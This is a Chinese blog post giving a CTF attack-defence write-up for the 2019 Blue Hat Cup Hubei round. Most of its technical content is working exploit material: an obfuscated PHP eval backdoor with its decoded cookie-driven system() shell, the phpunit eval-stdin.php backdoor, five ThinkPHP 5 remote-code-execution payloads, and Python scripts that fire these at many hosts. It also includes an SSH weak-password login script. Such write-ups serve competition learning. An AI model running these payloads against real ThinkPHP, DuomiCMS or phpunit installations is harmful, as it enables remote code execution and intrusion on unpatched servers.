<!DOCTYPE html>













<html class="theme-next muse" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: true,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>


  




  <meta name="description" content="第三届蓝帽杯湖北赛区赛后总结摘要这次比赛有两道web，部署在同一台机子中，网站根目录分别存储有 web1 , web2 两个网站源码，外部端口分别对应 80 , 81 两个端口。获取 flag 的方式为 curl http://192.168.100.1/Getkey 。">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="Blue-hat-2019湖北赛区WP">
<meta property="og:url" content="https://zo1ro.github.io/2019/06/23/blue-hat-2019/index.html">
<meta property="og:site_name" content="ZO1RO">
<meta property="og:description" content="第三届蓝帽杯湖北赛区赛后总结摘要这次比赛有两道web，部署在同一台机子中，网站根目录分别存储有 web1 , web2 两个网站源码，外部端口分别对应 80 , 81 两个端口。获取 flag 的方式为 curl http://192.168.100.1/Getkey 。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://zo1ro.github.io/2019/06/23/blue-hat-2019/1.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/06/23/blue-hat-2019/2.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/06/23/blue-hat-2019/3.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/06/23/blue-hat-2019/4.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/06/23/blue-hat-2019/5.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/06/23/blue-hat-2019/6.png">
<meta property="og:updated_time" content="2019-06-27T15:04:43.825Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Blue-hat-2019湖北赛区WP">
<meta name="twitter:description" content="第三届蓝帽杯湖北赛区赛后总结摘要这次比赛有两道web，部署在同一台机子中，网站根目录分别存储有 web1 , web2 两个网站源码，外部端口分别对应 80 , 81 两个端口。获取 flag 的方式为 curl http://192.168.100.1/Getkey 。">
<meta name="twitter:image" content="https://zo1ro.github.io/2019/06/23/blue-hat-2019/1.png">



  <link rel="alternate" href="/atom.xml" title="ZO1RO" type="application/atom+xml">



  
  
  <link rel="canonical" href="https://zo1ro.github.io/2019/06/23/blue-hat-2019/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Blue-hat-2019湖北赛区WP | ZO1RO</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ZO1RO</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">一个向往acm的ctf_dog</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://zo1ro.github.io/2019/06/23/blue-hat-2019/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ZO1RO">
      <meta itemprop="description" content="永远做好最坏的打算">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZO1RO">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Blue-hat-2019湖北赛区WP

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-06-23 22:41:10" itemprop="dateCreated datePublished" datetime="2019-06-23T22:41:10+08:00">2019-06-23</time>
            

            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="第三届蓝帽杯湖北赛区赛后总结"><a href="#第三届蓝帽杯湖北赛区赛后总结" class="headerlink" title="第三届蓝帽杯湖北赛区赛后总结"></a>第三届蓝帽杯湖北赛区赛后总结</h1><h2 id="摘要"><a href="#摘要" class="headerlink" title="摘要"></a>摘要</h2><p>这次比赛有两道web，部署在同一台机子中，网站根目录分别存储有 <code>web1</code> , <code>web2</code> 两个网站源码，外部端口分别对应 <code>80</code> , <code>81</code> 两个端口。获取 <code>flag</code> 的方式为 <code>curl http://192.168.100.1/Getkey</code> 。</p>
 <a id="more"></a>
<p>前期据说别的赛区出现弱口令密码，需准备好弱口令修改密码自动脚本，这里自己写了一个简陋的脚本。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding:utf-8 -*-</span><br><span class="line">import paramiko</span><br><span class="line">import time</span><br><span class="line">ips = []</span><br><span class="line">ip = &apos;&apos;</span><br><span class="line">for i in range(1,33):</span><br><span class="line">  ip = &apos;4.4.%d.100&apos;%i</span><br><span class="line">  ips.append(ip)</span><br><span class="line"></span><br><span class="line">log_file=open(&apos;mpwdok.log&apos;,&apos;a+&apos;)</span><br><span class="line">log_file1=open(&apos;mpwderr.log&apos;,&apos;a+&apos;)</span><br><span class="line"># curl http://192.168.100.1/Getkey</span><br><span class="line"># &gt;/dev/null 2&gt;&amp;1 &amp;</span><br><span class="line">for ip in ip_list:</span><br><span class="line">    try:</span><br><span class="line">        s = paramiko.Transport((ip, 22))</span><br><span class="line">        # old_password_connect</span><br><span class="line">        s.connect(username=&apos;user&apos;, password=&apos;123456&apos;)</span><br><span class="line">        chan = s.open_session()</span><br><span class="line">        chan.get_pty()</span><br><span class="line">        chan.invoke_shell()</span><br><span class="line">        chan.send(&apos;sudo passwd user\n&apos;)</span><br><span class="line">        time.sleep(1)</span><br><span class="line">        # new_password_edit</span><br><span class="line">        chan.send(&apos;wuqilaoshi666\n&apos;)</span><br><span class="line">        time.sleep(1)</span><br><span class="line">        # new_password_edit</span><br><span class="line">        chan.send(&apos;wuqilaoshi666\n&apos;)</span><br><span class="line">        time.sleep(1)</span><br><span class="line">        log_file.write(&quot;\n&quot;+ip+&quot;\n=================================================================\n&quot;)</span><br><span class="line">        log_file.write(chan.recv(1024))</span><br><span class="line">        log_file.write(&quot;\n=================================================================&quot;)</span><br><span class="line">        print ip + &quot;edit success&quot;</span><br><span class="line">    except Exception,err:</span><br><span class="line">        log_file1.write(&quot;ERR:unable to connect %s:%s\n&quot; %(ip,err))</span><br></pre></td></tr></table></figure>
<p>索性没用上，进入主题，看题目。</p>
<h2 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h2><p><code>duomi-cms</code></p>
<p>打包下来进行源码扫描后发现</p>
<p><code>mobile/.index.php</code> 存在 <code>eval</code> 后门</p>
<p>源码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php $b=strrev(&quot;edoced_4&quot;.&quot;6esab&quot;);eval($b(str_replace(&quot; &quot;,&quot;&quot;,&quot;a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = &quot;))); </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><code>echo</code> 一下 <code>eval</code> 中的内容发现是这一串东西</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">//if(isset($_COOKIE[&apos;cm&apos;]))&#123;ob_start();system(base64_decode($_COOKIE[&apos;cm&apos;]).&apos; 2&gt;&amp;1&apos;);setcookie($_COOKIE[&apos;cn&apos;],$_COOKIE[&apos;cp&apos;].base64_encode(ob_get_contents()).$_COOKIE[&apos;cp&apos;]);ob_end_clean();&#125;</span><br></pre></td></tr></table></figure>
<p>在 <code>cookie</code> 存在一个后门，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  blue-hat echo &quot;cat /flag&quot;| base64</span><br><span class="line">Y2F0IC9mbGFnCg==</span><br></pre></td></tr></table></figure>
<p><img src="1.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  blue-hat echo &quot;ZmxhZ3toZWxsb193b3JsZCF9Cg&quot; | base64 --decode</span><br><span class="line">flag&#123;hello_world!&#125;%</span><br></pre></td></tr></table></figure>
<p>附脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding:utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import base64</span><br><span class="line">ips = []</span><br><span class="line">ip = &apos;&apos;</span><br><span class="line">for i in range(1,33):</span><br><span class="line">  ip = &apos;http://4.4.%d.100/mobile/.index.php&apos;%i</span><br><span class="line">  ips.append(ip)</span><br><span class="line">cookie = &#123;&apos;_ga&apos;:&apos;GA1.1.916666987.1559659316&apos;,&apos;PHPSESSID&apos;:&apos;fp2euo5vmnude78diq3gace8n4&apos;,&apos;ishistory&apos;:&apos;1&apos;,&apos;__tins__18779617&apos;:&apos;%7B%22sid%22%3A%201561000146802%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201561001946802%7D&apos;,&apos;__51cke__&apos;:&apos;&apos;,&apos; __51laig__&apos;:&apos;1&apos;,&apos;cm&apos;:&apos;Y2F0IC9mbGFnCg==&apos;&#125;</span><br><span class="line">for url in ips:</span><br><span class="line">  print base64.b64decode(requests.get(url,cookies=cookie).headers[&apos;Set-Cookie&apos;][1:].replace(&apos;%3D&apos;,&apos;=&apos;))</span><br></pre></td></tr></table></figure>
<p>赛后复现参考</p>
<p><a href="https://www.codercto.com/a/29241.html" target="_blank" rel="noopener">DuomiCMS3.0最新版漏洞挖掘</a></p>
<p>发现是一个前台 <code>getshell</code> 漏洞</p>
<p>构造 <code>payload</code> </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search.php?searchword=&#123;if:phpinfo()&#125;phpinfo()&#123;end</span><br></pre></td></tr></table></figure>
<p><img src="2.png" alt></p>
<h2 id="Web2"><a href="#Web2" class="headerlink" title="Web2"></a>Web2</h2><p>拉下源码发现后门</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">///var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">eval(&apos;?&gt;&apos; . file_get_contents(&apos;php://input&apos;));</span><br></pre></td></tr></table></figure>
<p>直接构造 <code>payload</code> </p>
<p><img src="3.png" alt></p>
<p>然后写通打脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">ips = []</span><br><span class="line">ip = &apos;&apos;</span><br><span class="line">for i in range(1,33):</span><br><span class="line">  ip = &apos;http://4.4.%d.100/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php&apos;%i</span><br><span class="line">  ips.append(ip)</span><br><span class="line">payload = &quot;&lt;?php system(\&quot;cat /flag\&quot;);&quot;</span><br><span class="line">for url in ips:</span><br><span class="line">  try:</span><br><span class="line">   res = requests.post(url=url,data=payload)</span><br><span class="line">   if res.status_code ==200:</span><br><span class="line">    print url</span><br><span class="line">    print res.text</span><br><span class="line">  except:</span><br><span class="line">   pass</span><br></pre></td></tr></table></figure>
<p>拉下来源码后迅速审计 <code>cve</code> ，发现是一个 <code>thinkphp5.*</code> 的任意代码执行漏洞</p>
<p>附上几个 <code>poc</code> </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?s=index/\think\Container/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=echo%20www_admintony_com</span><br><span class="line">？s=index/\think\Request/input&amp;filter=system&amp;data=echo%20www_admintony_com</span><br><span class="line">?s=index/\think\view\driver\Php/display&amp;content=%3C?php%20echo%20www_admintony_com;?%3E</span><br><span class="line">?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=echo%20www_admintony_com</span><br><span class="line">?s=index/\think\template\driver\file/write&amp;cacheFile=shell.php&amp;content=%3C?php%20echo%20\&quot;www_admintony_com\&quot;;?%3E</span><br></pre></td></tr></table></figure>
<p>发现第四个 <code>payload</code> 返回如下</p>
<p><img src="4.png" alt></p>
<p>这里 <code>payload</code> 释义解释一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">index/\think\Container/invokefunction&amp;function=call_user_func&amp;vars[0]=phpinfo&amp;vars[1]=1</span><br><span class="line"></span><br><span class="line">index是对应的模块，处于application文件夹中</span><br><span class="line"></span><br><span class="line">\think\Container 以反斜线开头，这就是我们想要实例化的类</span><br><span class="line"></span><br><span class="line">invokefunction是想\think\Container类想要调用的方法，</span><br><span class="line"></span><br><span class="line">function=call_user_func&amp;vars[0]=phpinfo&amp;vars[1]=1是对应invokefunction的参数。</span><br></pre></td></tr></table></figure>
<p>那么我们查看 <code>application</code> 目录下模块</p>
<p><img src="5.png" alt></p>
<p>可以看到这里有 <code>admin</code> , <code>api</code> , <code>behavior</code> , <code>shop</code> , <code>wap</code> 五个模块</p>
<p>没有之前收集 <code>payload</code> 中的 <code>index</code> 模块，更改模块名为以上任意一个后执行成功。</p>
<p><img src="6.png" alt></p>
<p>然后写通打脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">payload = &quot;api/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=curl http://192.168.100.1/Getkey&quot;</span><br><span class="line">ips = []</span><br><span class="line">ip = &apos;&apos;</span><br><span class="line">for i in range(1,33):</span><br><span class="line">  ip = &apos;http://4.4.%d.100/?s=&apos;%i</span><br><span class="line">  ips.append(ip)</span><br><span class="line">for url in ips:</span><br><span class="line">  print requests.get(url+payload).content</span><br></pre></td></tr></table></figure>
<p>利用这个洞苟到了最后，也可以写个假流量进行混打，干扰别人抓流量的速度。</p>
<p>参考链接</p>
<p><a href="https://www.secpulse.com/archives/92835.html" target="_blank" rel="noopener">ThinkPHP5 远程命令执行漏洞分析</a></p>
<p><a href="https://www.jianshu.com/p/46ceb2c338bc" target="_blank" rel="noopener">ThinkPHP 5.0 &amp; 5.1远程命令执行漏洞利用分析</a></p>
<p><a href="https://xz.aliyun.com/t/2828" target="_blank" rel="noopener">DuomiCMS3.0最新版漏洞挖掘</a></p>

      
    </div>

    

    
    
    

    
      <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束 <i class="fa fa-heart"></i> 感谢阅读-------------</div>

    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag">📖ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/10/notes/" rel="next" title="notes">
                <i class="fa fa-chevron-left"></i> notes
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">ZO1RO</p>
              <div class="site-description motion-element" itemprop="description">永远做好最坏的打算</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/ZO1RO" title="GitHub &rarr; https://github.com/ZO1RO" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="mailto:em8xcm93ZWJAMTYzLmNvbQo=" title="E-Mail &rarr; mailto:em8xcm93ZWJAMTYzLmNvbQo=" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wulidecade.cn" title="https://wulidecade.cn" rel="noopener" target="_blank">Decade</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://mang0.me/" title="http://mang0.me/" rel="noopener" target="_blank">Mang0</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#第三届蓝帽杯湖北赛区赛后总结"><span class="nav-number">1.</span> <span class="nav-text">第三届蓝帽杯湖北赛区赛后总结</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#摘要"><span class="nav-number">1.1.</span> <span class="nav-text">摘要</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web1"><span class="nav-number">1.2.</span> <span class="nav-text">web1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Web2"><span class="nav-number">1.3.</span> <span class="nav-text">Web2</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ZO1RO</span>

  

  
</div>









        








        
      </div>
    </footer>

    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.1"></script>

  <script src="/js/motion.js?v=7.1.1"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.1.1"></script>



  
  <script src="/js/scrollspy.js?v=7.1.1"></script>
<script src="/js/post-details.js?v=7.1.1"></script>



  


  <script src="/js/next-boot.js?v=7.1.1"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
